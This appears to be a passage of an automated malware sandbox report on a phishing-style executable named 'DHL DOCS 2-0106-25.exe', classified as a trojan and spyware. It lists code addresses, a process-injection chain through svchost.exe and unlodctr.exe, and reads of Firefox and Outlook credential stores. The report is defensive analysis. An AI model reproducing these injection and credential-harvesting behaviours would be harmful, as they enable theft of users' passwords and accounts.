Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	Code function: 3_2_042E0AA6	3_2_042E0AA6
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	Code function: 3_2_042E0AB2	3_2_042E0AB2
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	Code function: 3_2_043013F2	3_2_043013F2
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	Code function: 3_2_042D6BE4	3_2_042D6BE4
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A703E6	4_2_03A703E6
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039BE3F0	4_2_039BE3F0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A6A352	4_2_03A6A352
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A302C0	4_2_03A302C0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A50274	4_2_03A50274
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A641A2	4_2_03A641A2
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A701AA	4_2_03A701AA
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A681CC	4_2_03A681CC
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039A0100	4_2_039A0100
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A4A118	4_2_03A4A118
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A38158	4_2_03A38158
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A42000	4_2_03A42000
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039AC7C0	4_2_039AC7C0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039D4750	4_2_039D4750
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039B0770	4_2_039B0770
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039CC6E0	4_2_039CC6E0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A70591	4_2_03A70591
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039B0535	4_2_039B0535
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A5E4F6	4_2_03A5E4F6
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A54420	4_2_03A54420
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A62446	4_2_03A62446
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A66BD7	4_2_03A66BD7
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A6AB40	4_2_03A6AB40
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039AEA80	4_2_039AEA80
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A7A9A6	4_2_03A7A9A6
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039B29A0	4_2_039B29A0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039C6962	4_2_039C6962
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039968B8	4_2_039968B8
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039DE8F0	4_2_039DE8F0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039BA840	4_2_039BA840
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039B2840	4_2_039B2840
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A2EFA0	4_2_03A2EFA0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039A2FC8	4_2_039A2FC8
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A52F30	4_2_03A52F30
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039D0F30	4_2_039D0F30
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039F2F28	4_2_039F2F28
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A24F40	4_2_03A24F40
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039C2E90	4_2_039C2E90
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A6CE93	4_2_03A6CE93
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A6EEDB	4_2_03A6EEDB
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A6EE26	4_2_03A6EE26
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039B0E59	4_2_039B0E59
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039C8DBF	4_2_039C8DBF
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039AADE0	4_2_039AADE0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039BAD00	4_2_039BAD00
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A4CD1F	4_2_03A4CD1F
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A50CB5	4_2_03A50CB5
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039A0CF2	4_2_039A0CF2
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039B0C00	4_2_039B0C00
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039F739A	4_2_039F739A
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A6132D	4_2_03A6132D
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_0399D34C	4_2_0399D34C
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039B52A0	4_2_039B52A0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A512ED	4_2_03A512ED
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039CB2C0	4_2_039CB2C0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039CD2F0	4_2_039CD2F0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039BB1B0	4_2_039BB1B0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A7B16B	4_2_03A7B16B
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_0399F172	4_2_0399F172
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039E516C	4_2_039E516C
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A6F0E0	4_2_03A6F0E0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A670E9	4_2_03A670E9
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039B70C0	4_2_039B70C0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A5F0CC	4_2_03A5F0CC
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A6F7B0	4_2_03A6F7B0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A616CC	4_2_03A616CC
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039F5630	4_2_039F5630
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A4D5B0	4_2_03A4D5B0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A795C3	4_2_03A795C3
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A67571	4_2_03A67571
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A6F43F	4_2_03A6F43F
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039A1460	4_2_039A1460
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039CFB80	4_2_039CFB80
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A25BF0	4_2_03A25BF0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039EDBF9	4_2_039EDBF9
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A6FB76	4_2_03A6FB76
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A51AA3	4_2_03A51AA3
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A4DAAC	4_2_03A4DAAC
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039F5AA0	4_2_039F5AA0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A5DAC6	4_2_03A5DAC6
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A23A6C	4_2_03A23A6C
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A67A46	4_2_03A67A46
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A6FA49	4_2_03A6FA49
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A45910	4_2_03A45910
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039B9950	4_2_039B9950
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039CB950	4_2_039CB950
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039B38E0	4_2_039B38E0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A1D800	4_2_03A1D800
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039B1F92	4_2_039B1F92
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A6FFB1	4_2_03A6FFB1
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03973FD5	4_2_03973FD5
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03973FD2	4_2_03973FD2
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A6FF09	4_2_03A6FF09
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039B9EB0	4_2_039B9EB0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039CFDC0	4_2_039CFDC0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A67D73	4_2_03A67D73
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039B3D40	4_2_039B3D40
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A61D5A	4_2_03A61D5A
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A6FCF2	4_2_03A6FCF2
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_03A29C32	4_2_03A29C32
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_02F91E40	4_2_02F91E40
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_02F8AF30	4_2_02F8AF30
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_02F8CF20	4_2_02F8CF20
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_02F8CD00	4_2_02F8CD00
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_02F813F3	4_2_02F813F3
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_02F81375	4_2_02F81375
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_02F8B080	4_2_02F8B080
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_02F8B074	4_2_02F8B074
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_02F811B2	4_2_02F811B2
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_02F936D0	4_2_02F936D0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_02F936CB	4_2_02F936CB
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_02F954C0	4_2_02F954C0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_02FAB9C0	4_2_02FAB9C0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_037BE3A4	4_2_037BE3A4
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_037BE4C3	4_2_037BE4C3
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_037BD928	4_2_037BD928
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_037BE85C	4_2_037BE85C

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 030AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0302B970 appears 262 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 030BF290 appears 103 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03075130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03087E54 appears 107 times
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: String function: 001D0A30 appears 46 times
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: String function: 001CF9F2 appears 31 times
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: String function: 039F7E54 appears 107 times
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: String function: 03A1EA12 appears 86 times
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: String function: 0399B970 appears 262 times
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: String function: 039E5130 appears 58 times
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: String function: 03A2F290 appears 103 times

Source: DHL DOCS 2-0106-25.exe, 00000000.00000003.1658539949.0000000003E5D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs DHL DOCS 2-0106-25.exe
Source: DHL DOCS 2-0106-25.exe, 00000000.00000003.1657568029.0000000003CB3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs DHL DOCS 2-0106-25.exe

Source: DHL DOCS 2-0106-25.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/2@13/8

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe

Code function: 0_2_002237B5 GetLastError,FormatMessageW,

0_2_002237B5

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_002110BF AdjustTokenPrivileges,CloseHandle,		0_2_002110BF
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_002116C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_002116C3

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe

Code function: 0_2_002251CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_002251CD

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe

Code function: 0_2_0023A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0023A67C

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe

Code function: 0_2_0022648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0022648E

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe

Code function: 0_2_001B42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_001B42A2

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe

File created: C:\Users\user\AppData\Local\Temp\conged

Jump to behavior

Source: DHL DOCS 2-0106-25.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unlodctr.exe, 00000004.00000003.2113155880.0000000003382000.00000004.00000020.00020000.00000000.sdmp, unlodctr.exe, 00000004.00000003.2113047250.0000000003360000.00000004.00000020.00020000.00000000.sdmp, unlodctr.exe, 00000004.00000002.4112047770.0000000003382000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: DHL DOCS 2-0106-25.exe	ReversingLabs: Detection: 52%
Source: DHL DOCS 2-0106-25.exe	Virustotal: Detection: 29%

Source: unknown	Process created: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe "C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe"
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe"
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	Process created: C:\Windows\SysWOW64\unlodctr.exe "C:\Windows\SysWOW64\unlodctr.exe"
Source: C:\Windows\SysWOW64\unlodctr.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe"	Jump to behavior
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	Process created: C:\Windows\SysWOW64\unlodctr.exe "C:\Windows\SysWOW64\unlodctr.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: loadperf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\unlodctr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\unlodctr.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: DHL DOCS 2-0106-25.exe

Static file information: File size 1601024 > 1048576

Source: DHL DOCS 2-0106-25.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: DHL DOCS 2-0106-25.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: DHL DOCS 2-0106-25.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: DHL DOCS 2-0106-25.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: DHL DOCS 2-0106-25.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: DHL DOCS 2-0106-25.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: DHL DOCS 2-0106-25.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: unlodctr.pdbGCTL source: svchost.exe, 00000001.00000003.1898083135.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, MSNzUrVSel.exe, 00000003.00000002.4112336579.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: MSNzUrVSel.exe, 00000003.00000002.4111917290.0000000000B8E000.00000002.00000001.01000000.00000005.sdmp, MSNzUrVSel.exe, 00000007.00000002.4112705389.0000000000B8E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: DHL DOCS 2-0106-25.exe, 00000000.00000003.1655948810.0000000003850000.00000004.00001000.00020000.00000000.sdmp, DHL DOCS 2-0106-25.exe, 00000000.00000003.1656713658.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1931359522.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1836017240.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1838007778.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1931359522.0000000003000000.00000040.00001000.00020000.00000000.sdmp, unlodctr.exe, 00000004.00000003.1933601891.00000000037C6000.00000004.00000020.00020000.00000000.sdmp, unlodctr.exe, 00000004.00000003.1931089805.0000000003610000.00000004.00000020.00020000.00000000.sdmp, unlodctr.exe, 00000004.00000002.4113794857.0000000003970000.00000040.00001000.00020000.00000000.sdmp, unlodctr.exe, 00000004.00000002.4113794857.0000000003B0E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: DHL DOCS 2-0106-25.exe, 00000000.00000003.1655948810.0000000003850000.00000004.00001000.00020000.00000000.sdmp, DHL DOCS 2-0106-25.exe, 00000000.00000003.1656713658.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1931359522.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1836017240.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1838007778.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1931359522.0000000003000000.00000040.00001000.00020000.00000000.sdmp, unlodctr.exe, unlodctr.exe, 00000004.00000003.1933601891.00000000037C6000.00000004.00000020.00020000.00000000.sdmp, unlodctr.exe, 00000004.00000003.1931089805.0000000003610000.00000004.00000020.00020000.00000000.sdmp, unlodctr.exe, 00000004.00000002.4113794857.0000000003970000.00000040.00001000.00020000.00000000.sdmp, unlodctr.exe, 00000004.00000002.4113794857.0000000003B0E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: unlodctr.pdb source: svchost.exe, 00000001.00000003.1898083135.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, MSNzUrVSel.exe, 00000003.00000002.4112336579.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: unlodctr.exe, 00000004.00000002.4112047770.00000000032FE000.00000004.00000020.00020000.00000000.sdmp, unlodctr.exe, 00000004.00000002.4114712280.0000000003F9C000.00000004.10000000.00040000.00000000.sdmp, MSNzUrVSel.exe, 00000007.00000000.2002287566.0000000002B8C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2224402166.000000003D13C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: unlodctr.exe, 00000004.00000002.4112047770.00000000032FE000.00000004.00000020.00020000.00000000.sdmp, unlodctr.exe, 00000004.00000002.4114712280.0000000003F9C000.00000004.10000000.00040000.00000000.sdmp, MSNzUrVSel.exe, 00000007.00000000.2002287566.0000000002B8C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2224402166.000000003D13C000.00000004.80000000.00040000.00000000.sdmp

Source: DHL DOCS 2-0106-25.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: DHL DOCS 2-0106-25.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: DHL DOCS 2-0106-25.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: DHL DOCS 2-0106-25.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: DHL DOCS 2-0106-25.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe

Code function: 0_2_001B42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_001B42DE

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_001D0A76 push ecx; ret	0_2_001D0A89
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0042E855 push edi; ret	1_2_0042E86F
